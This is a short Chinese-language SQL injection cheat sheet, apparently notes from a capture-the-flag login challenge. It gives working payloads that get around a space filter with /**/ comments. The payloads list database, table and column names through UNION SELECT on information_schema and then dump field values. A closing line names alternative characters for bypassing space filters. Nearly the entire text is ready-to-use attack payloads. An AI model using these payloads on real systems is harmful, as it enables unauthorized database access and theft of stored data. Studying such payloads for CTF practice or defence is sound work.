1' or 1=1#返回sql注入错误
当无空格是正常返回
1'/**/or/**/1=1#&password=
查库
1'/**/union/**/select/**/1,database(),3#&password=
查表 1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=
查列 1'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='表名'#&password= 查字段记录值 '/**/union/**/select/**/1,group_concat(列名),3/**/from/**/表名#&password=
注:常用空格过滤替换字符串为/**/ TAB 双空格 回车 反引号